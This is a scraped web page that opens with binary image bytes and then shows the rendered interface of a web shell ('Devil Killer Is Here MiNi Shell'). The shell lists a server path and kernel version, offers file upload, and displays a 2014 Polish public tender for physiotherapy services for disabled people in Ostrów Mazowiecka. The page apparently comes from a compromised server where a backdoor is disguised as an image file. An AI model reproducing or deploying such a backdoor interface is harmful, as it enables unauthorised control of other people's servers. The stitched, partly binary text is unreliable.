JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140521/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140521/109413-N-2014.html

<p class="kh_header"><b>Ostrów Mazowiecka: Zorganizowanie i przeprowadzenie  rehabilitacji dla uczestników projektu systemowego Twoja przyszłość w Twoich rękach, realizowanego przez Powiatowe Centrum Pomocy Rodzinie w  Ostrowi Mazowieckiej  współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII: Promocja integracji społecznej, Działanie 7.1 Rozwój  i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie oraz ich otoczenia</b><br>
<b>Numer ogłoszenia: 109413 - 2014; data zamieszczenia: 21.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Widnichowska 20, 07-300 Ostrów Mazowiecka, woj. mazowieckie, tel. 29 645 53 98, faks 29 645 53 98.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrowmaz.pcpr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie  rehabilitacji dla uczestników projektu systemowego Twoja przyszłość w Twoich rękach, realizowanego przez Powiatowe Centrum Pomocy Rodzinie w  Ostrowi Mazowieckiej  współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII: Promocja integracji społecznej, Działanie 7.1 Rozwój  i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie oraz ich otoczenia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie  rehabilitacji dla uczestników projektu systemowego Twoja przyszłość w Twoich rękach, realizowanego przez Powiatowe Centrum Pomocy Rodzinie w  Ostrowi Mazowieckiej  współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII: Promocja integracji społecznej, Działanie 7.1 Rozwój  i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie oraz ich otoczenia.
1.	Część 1 - wykonanie zestawów zabiegów z zakresu rehabilitacji  w wymiarze 10 zestawów zabiegów dla każdej z osób, według wskazań lekarza, dla11 osób niepełnosprawnych  w wieku powyżej 16. roku  życia poza miejscem ich zamieszkania. 
2.	Część 2 - wykonanie zestawów zabiegów z zakresu rehabilitacji  w wymiarze 10 zestawów zabiegów dla każdej z osób, według wskazań lekarza, dla 32 osób niepełnosprawnych  w wieku powyżej 16. roku  życia w miejscu ich zamieszkania. 
3.   Część 3 - wykonanie zestawów zabiegów z zakresu rehabilitacji  w wymiarze 10 zestawów zabiegów dla każdej z osób, według wskazań lekarza, dla 14 dzieci niepełnosprawnych w wieku poniżej 16.roku życia w miejscu ich zamieszkania.
Wszystkie osoby dorosłe, które skorzystają z rehabilitacji są uczestnikami projektu systemowego Twoja przyszłość w Twoich rękach współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego a dzieci- otoczeniem osób biorących udział w projekcie.
W przypadku, gdy wystąpi okoliczność, że niemożliwym stanie się przeprowadzenie rehabilitacji zdrowotnej dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby osób..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli osoba/y wykonująca/e zamówienie legitymować się będzie/ą wykształceniem wyższym lub policealnym z zakresu rehabilitacji lub fizjoterapii. Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do SIWZ)  złożonego przez Wykonawcę oraz wykazu osób biorących udział w wykonywaniu zamówienia wraz ze wskazaniem ich wykształcenia (załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada niezbędną wiedzę i doświadczenie jeżeli dla  osoby/osób wykonującej/ych zamówienie wykaże  co najmniej 3-letnie doświadczenie zawodowe w zakresie wykonywania rehabilitacji dla każdej oddzielnie. Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do SIWZ) oraz wykazu doświadczenia zawodowego (załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia, jeżeli:
1. przedstawi wykaz sprzętu do wykonywania zabiegów rehabilitacyjnych lub/i sprzętu wspomagającego ich wykonywanie obejmujący swym zakresem co najmniej: zestaw do elektroterapii z osprzętem, lampę SOLUX,  zestaw do magnetoterapii, zestaw do ultradźwięków, zestaw do biostymulacji laserowej. Wykaz musi obejmować sprzęt, który będzie wykorzystywany do realizacji zamówienia. W przypadku ubiegania się o wykonywanie części 2. i 3. musi być możliwe użycie wszystkich w.w. urządzeń  w miejscu zamieszkania osób korzystających z rehabilitacji. 
oraz
2.w przypadku ubiegania się o wykonywanie części 2. i 3. przedstawi pojazd, którym będzie dojeżdżał do uczestników rehabilitacji;
oraz
3.w przypadku ubiegania się o wykonywania 1. części zamówienia wskaże miejsce wykonywania zamówienia
Ocena spełniania warunku zostanie dokonana na podstawie:
1.oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez Wykonawcę (zał. nr 3 do SIWZ)  
oraz
2.wykazu sprzętu/ pojazdu/ wskazania miejsca, którym dysponuje Wykonawca i który będzie wykorzystywany do realizacji zamówienia (załącznik nr 6 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli wskaże osoby, które będą wykonywały zamówienie. Osoby wskazane do wykonywania zabiegów rehabilitacyjnych muszą posiadać wykształcenie wyższe na kierunku Fizjoterapia lub Rehabilitacja oraz ukończony co najmniej 2-stopniowy kurs  koncepcji PNF.
Ocena spełniania warunku zostanie dokonana na podstawie:
1.oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez Wykonawcę (zał. nr 3 do SIWZ)  
oraz
wykazu osób biorących udział w wykonywaniu zamówienia wraz z wykazem posiadanego przez nich wykształcenia (załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu  złożonego przez Wykonawcę (załącznik nr 3 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik Nr 1 do SIWZ - Formularz oferty.
Załącznik Nr 3 do SIWZ- Oświadczenie o spełnianiu warunków udziału w postępowaniu,
Załącznik Nr 4 do SIWZ- Wykaz osób, które będą brały udział w wykonywaniu zamówienia,
Załącznik Nr 5 do SIWZ- Oświadczenie o  niezaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne,	
 Załącznik Nr 6 do SIWZ- Wykaz sprzętu, miejsca, pojazdu, którymi Wykonawca dysponuje do wykonywania zamówienia
Załącznik nr 7 do SIWZ-  Oświadczenie o tym, w jakiej części wykonanie zamówienia zostanie zlecone podwykonawcom (oświadczenie należy złożyć jedynie w przypadku, gdy wykonanie zamówienia zostanie zlecone podwykonawcom),
Załącznik nr 8 do SIWZ- Informacja o przynależności do grupy kapitałowej
Załącznik nr 9 do SIWZ-  Oświadczenie Wykonawcy zgodnie z art. 36 b ust. 1 ustawy Prawo Zamówień Publicznych (Dz. U. z 2013 r. poz. 907, 984, 1047, 1473 oraz z 2014 r. poz. 423)
Załącznik nr 10 do SIWZ- Wzór oznakowania dokumentu,
Załącznik nr 11 do SIWZ-  Projekt umowy- parafowany</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://biuletyn.abip.pl/pcprostrowmaz<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> pcpr@powiatostrowmaz.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2014 godzina 12:00, miejsce: Powiatowe Centrum Pomocy Rodzinie 
ul. Widichowska 20
07-300 Ostrów Mazowiecka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Twoja przyszłość w Twoich rękach,  w ramach którego realizowane będą zabiegi rehabilitacyjne jest współfinansowany ze środków Programu Operacyjnego Kapitał Ludzki w 85%.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wykonanie zestawów zabiegów z zakresu rehabilitacji  w wymiarze 10 zestawów zabiegów dla każdej z osób, według wskazań lekarza, dla11 osób niepełnosprawnych  w wieku powyżej 16. roku  życia poza miejscem ich zamieszkania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie zestawów zabiegów z zakresu rehabilitacji  w wymiarze 10 zestawów zabiegów dla każdej z osób, według wskazań lekarza, dla 11 osób niepełnosprawnych  w wieku powyżej 16. roku  życia.  
1 zestaw zabiegów jest równoznaczny ze wskazanym w zleceniu lekarskim,  wystawionym indywidualnie dla każdej ze skierowanych osób, zestawem zabiegów, trwającym co najmniej 1 godzinę zegarową. Potwierdzone za zgodność z oryginałem kopie imiennych zleceń na zabiegi, wystawionych przez lekarza rehabilitacji, zostaną przekazane wybranemu Wykonawcy po podpisaniu umowy. 
1. Miejsce realizacji zamówienia: teren miasta Ostrów Mazowiecka- w miejscu wykonywania działalności przez Wykonawcę lub w innym lokalu na terenie miasta Ostrów Mazowiecka znajdującym się  w odległości nie większej niż 2 kilometry od siedziby Urzędu Miasta Ostrów Mazowiecka tj. ul. 3 Maja 66 (odległość liczona będzie według możliwej do przejścia piechotą- trasy). Lokal, w którym wykonywana będzie rehabilitacja musi być dostosowany dla osób niepełnosprawnych mających problemy w poruszaniu się, musi też być wyposażony w niezbędne wyposażenie do przeprowadzenia zabiegów fizjoterapii. 
2. Termin realizacji zamówienia: 15.06.2014- 30.11.2014r. Terminy rehabilitacji muszą zostać uzgodnione indywidualnie z jej uczestnikami, z uwzględnieniem ich zajęć (kursów, szkoleń) w ramach realizacji projektu oraz innych okoliczności determinujących termin wykonania zamówienia;
3. Rehabilitacja każdego z uczestników powinna się odbywać przynajmniej raz w tygodniu, częstotliwość ustalona zostanie indywidualnie z każdym z uczestników przez Wykonawcę.
4.Termin płatności: 14 dni od dnia przedstawienia rachunku/faktury za wykonane zabiegi, wystawionego/ej po podpisaniu Protokołu Odbioru Usługi. Wykonawca przekaże Zamawiającemu oryginały dokumentów potwierdzających wykonanie usług, celem prawidłowego rozliczenia wykonania zadania, w terminie maksymalnie 7 dni od zakończenia wykonywania usług. Nie ma możliwości wypłacania zaliczek. 
5. Wynagrodzenie wypłacone zostanie tylko za wykonaną rehabilitację, co musi być potwierdzone podpisami osób z niej korzystających, a w przypadku osób niepełnoletnich, podpisem opiekuna.
6.   Wykonawca przekaże Zamawiającemu po zakończeniu rehabilitacji Indywidualne Karty Odbioru Usług, w których oznaczone będą rodzaje zabiegów wykonanych dla każdego z uczestników oraz  Opinię zawierającą opis stanu na początku i na koniec zabiegów oraz wskazanie czy rehabilitacja jest zakończona czy należy ją w dalszym ciągu kontynuować.
7.Wykonawca musi umożliwić wyeksponowanie informacji o współfinansowaniu rehabilitacji ze środków EFS w miejscu i czasie prowadzenia rehabilitacji  oraz umieszczenie odpowiednich logotypów, dostarczonych przez Zamawiającego na dokumentacji dotyczącej uczestników projektu.
8.Wykonawca  zobowiązany jest do przechowywania dokumentów do dnia 31.12.2020r. 
9. Zamawiający zastrzega sobie prawo prowadzenia bieżącego nadzoru nad procesem rehabilitacji uczestnika, na każdym jego etapie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wykonanie zestawów zabiegów z zakresu rehabilitacji  w wymiarze 10 zestawów zabiegów dla każdej z osób, według wskazań lekarza, dla 32 osób niepełnosprawnych  w wieku powyżej 16. roku  życia w miejscu ich zamieszkania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie zestawów zabiegów z zakresu rehabilitacji (masaży, ćwiczeń i innych zabiegów rehabilitacyjnych z zakresu rehabilitacji ortopedycznej, neurologicznej lub innej wskazanej dla dysfunkcji zdrowotnej skierowanych uczestników) w wymiarze 10 zestawów zabiegów dla każdej z osób, według wskazań lekarza, dla 32 osób niepełnosprawnych  w wieku powyżej 16. roku  życia.  1 zestaw zabiegów jest równoznaczny ze wskazanym w zleceniu lekarskim,  wystawionym indywidualnie dla każdej ze skierowanych osób, zestawem zabiegów, trwającym co najmniej 1 godzinę zegarową. Potwierdzone za zgodność z oryginałem kopie imiennych zleceń, wystawionych przez lekarza rehabilitacji, zostaną przekazane wybranemu Wykonawcy po podpisaniu umowy.
1. Miejsce realizacji zamówienia: w miejscu zamieszkania osób uczestniczących w rehabilitacji, zamieszkałych w następujących miejscowościach: Ostrów Mazowiecka- 7 osób, Kalinowo Parcele- 1 osoba, Komorowo- 1 osoba, Podborze- 1 osoba, Stare Lubiejewo- 2 osoby, Małkinia- 5 osób, Zawisty Podleśne- 1 osoba, Grądy k. Małkini- 1 osoba, Puzdrowizna- 1 osoba, Chmielewo- 2 osoby, Zaręby Leśne- 1 osoba, Nowa Złotoria- 1 osoba, Zaręby Kościelne- 1 osoba, Grędzice- 1 osoba, Sulęcin Włosciański- 1 osoba, Nowe Lubiejewo- 1 osoba, Przyjmy k. Poręby- 1 osoba, Wąsewo- 2 osoby, Brok- 1 osoba. Wykonawca musi dysponować sprzętem niezbędnym do wykonania zabiegów rehabilitacyjnych w wymaganym zakresie. Wykonawca w przedstawionej ofercie musi przewidzieć koszty dojazdu, gdyż Zamawiający nie będzie dodatkowo ponosił kosztów dojazdu Wykonawcy.
2. Termin realizacji zamówienia: 15.06.2014- 30.11.2014r. Terminy rehabilitacji muszą zostać uzgodnione indywidualnie z jej uczestnikami, z uwzględnieniem ich zajęć (kursów, szkoleń) w ramach realizacji projektu oraz innych okoliczności determinujących termin wykonania zamówienia;
3. Rehabilitacja każdego z uczestników powinna się odbywać przynajmniej raz w tygodniu, częstotliwość ustalona zostanie indywidualnie z każdym z uczestników przez Wykonawcę.
4.Termin płatności: 14 dni od dnia przedstawienia rachunku/faktury za wykonane zabiegi, wystawionego/ej po podpisaniu Protokołu Odbioru Usługi. Wykonawca przekaże Zamawiającemu oryginały dokumentów potwierdzających wykonanie usług, celem prawidłowego rozliczenia wykonania zadania, w terminie maksymalnie 7 dni od zakończenia wykonywania usług. Nie ma możliwości wypłacania zaliczek. 
5. Wynagrodzenie wypłacane będzie tylko za wykonaną rehabilitację, co musi być potwierdzone podpisami osób z niej korzystających, a w przypadku osób niepełnoletnich, podpisem opiekuna.
6.   Wykonawca przekaże Zamawiającemu po zakończeniu rehabilitacji Indywidualne Karty Odbioru Usług, w których oznaczone będą rodzaje zabiegów wykonanych dla każdego z uczestników oraz  Opinię zawierającą opis stanu na początku i na koniec zabiegów oraz wskazanie czy rehabilitacja jest zakończona czy należy ją w dalszym ciągu kontynuować.
7.Wykonawca musi umożliwić wyeksponowanie informacji o współfinansowaniu rehabilitacji ze środków EFS w miejscu i czasie prowadzenia rehabilitacji  oraz umieszczenie odpowiednich logotypów, dostarczonych przez Zamawiającego na dokumentacji dotyczącej uczestników projektu.
8.Wykonawca  zobowiązany jest do przechowywania dokumentów do dnia 31.12.2020r. 
9. Zamawiający zastrzega sobie prawo prowadzenia bieżącego nadzoru nad procesem rehabilitacji uczestnika, na każdym jego etapie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wykonanie zestawów zabiegów z zakresu rehabilitacji  w wymiarze 10 zestawów zabiegów dla każdej z osób, według wskazań lekarza, dla 14 dzieci niepełnosprawnych w wieku poniżej 16.roku życia w miejscu ich zamieszkania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wykonanie zestawów zabiegów z zakresu rehabilitacji (masaży, ćwiczeń i innych zabiegów rehabilitacyjnych) w wymiarze 10 zestawów zabiegów dla każdej z osób, według wskazań lekarza, dla 14 dzieci niepełnosprawnych w wieku poniżej 16.roku życia. 1 zestaw zabiegów jest równoznaczny ze wskazanym w zleceniu lekarskim,  wystawionym indywidualnie dla każdej ze skierowanych osób, zestawem zabiegów. Potwierdzone za zgodność z oryginałem kopie imiennych, wystawionych przez lekarza rehabilitacji,  zleceń zostaną przekazane wybranemu Wykonawcy po podpisaniu umowy.
1. Miejsce realizacji zamówienia:  w miejscu zamieszkania osób uczestniczących w rehabilitacji, zamieszkałych w następujących miejscowościach: Małkinia- 1 osoba, Prostyń- 1 osoba, Żachy Pawły- 1 osoba, Bagatele- 1 osoba, Ostrów Mazowiecka- 4 osoby, Gródźki- 1 osoba, Stare Lubiejewo- 1 osoba, Komorowo- 1 osoba, Nowa Ruskołęka- 1 osoba, Zaręby Kościelne- 1 osoba, Pętkowo Wielkie- 1 osoba. Wykonawca musi dysponować sprzętem niezbędnym do wykonania zabiegów rehabilitacyjnych w wymaganym zakresie.  Wykonawca w przedstawionej ofercie musi przewidzieć koszty dojazdu, gdyż Zamawiający nie będzie dodatkowo ponosił kosztów dojazdu Wykonawcy. 
2. Termin realizacji zamówienia: 15.06.2014- 30.11.2014r. Terminy rehabilitacji muszą zostać uzgodnione indywidualnie z jej uczestnikami, z uwzględnieniem ich zajęć w ramach realizacji projektu oraz innych okoliczności determinujących termin wykonania zamówienia;
3. Rehabilitacja każdego z uczestników musi odbywać się przynajmniej raz w tygodniu, częstotliwość ustalona zostanie indywidualnie z każdym z uczestników przez Wykonawcę.
